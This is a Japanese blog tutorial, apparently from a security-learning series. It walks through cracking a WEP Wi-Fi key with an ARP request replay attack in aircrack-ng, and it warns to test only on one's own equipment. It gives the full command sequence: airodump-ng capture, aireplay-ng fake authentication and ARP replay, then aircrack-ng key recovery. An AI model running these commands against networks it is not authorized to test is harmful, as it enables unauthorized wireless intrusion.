はじめに
KaliLinuxで利用しているwifiアダプタが利用できないので、別のノートパソコンにaircrack-ngパッケージをインストールして動作を検証しています。挙動や作業に大きな代わりはないです。
ちなみに、ノートパソコンのOSはOpensuse Leap15.3です。
注意事項
記事で紹介されている行為を他人や団体、インフラなどの許可を得ずに行った場合、犯罪となる可能性が有ります。
あくまでも、記事の内容は情報セキュリティの学習です。読者様の所有・管理の機器、システムでのみ実行してください。
また、読者さまのシステムにトラブルが起きたとしても、私は責任を負いかねます。
ARP要求リプレイ攻撃
ARP要求を故意に繰り返したり、遅延させたりすることで、パケット(含むIV)を増加させる攻撃。
検証
無線LANアダプタのMACアドレスを変更する
この記事を参考にしてください。
無線LANアダプタをMonitorモードにする
この記事を参考にしてください。
airodump-ngを実行する
arp要求リプレイ攻撃用のフォルダを用意してから、airodump-ng
コマンドを実行する。
mkdir arp_attack
cd arp _attack
sudo airodump-ng --channel 2 --bssid <ターゲットのbssid> --write arp-attack wlan0
aireplay-ngで偽の認証
新規に別の端末を立ち上げて、次のコマンドを実行する。
sudo aireplay-ng --fakeauth 0 -a <ターゲットのbssid> -h <送信元のMACアドレス> wlan0
aireplay-ngに--arpreplayオプションをつけてARPリクエストリプレイ攻撃
sudo aireplay-ng --arpreplay -b <ターゲットのbssid> -h <送信元のMACアドレス> wlan0
//または、
sudo aireplay-ng -3 -b <ターゲットのbssid> -h <送信元のMACアドレス> wlan0
-3オプションは、--arpreplayオプションの簡略表記。
wepキーを解析
さらに、新規に別の端末を立ち上げて、次のコマンドを実行する。
sudo aircrack-ng arp-attack-01.cap
おわりに
WEPでの解析検証は一通り終わった。
パスワード"55555"だと、どのWEPへのハッキング手法でも、だいたい25000IVsぐらい集めれば解析できた。
おおよその流れとして、無線LANアダプタのモード変更やMACアドレスの固定化のあとに、
- キャプチャ担当のairodump-ng
- 細工担当のaireplay-ng
- 解析担当のaircrack-ng
の3つが共同してパスワード解析をする。
細工担当のaireplay-ngのオプションの違いで、chopchop攻撃やARPリクエストリプライ攻撃といった攻撃方法の選択をする。
オプションの対応表はこうなる
冗長表記 | 簡略表記 |
---|---|
--fakeauth | -1 |
--interactive | -2 |
--arpreplay | -3 |
--chopchop | -4 |
※他にもあり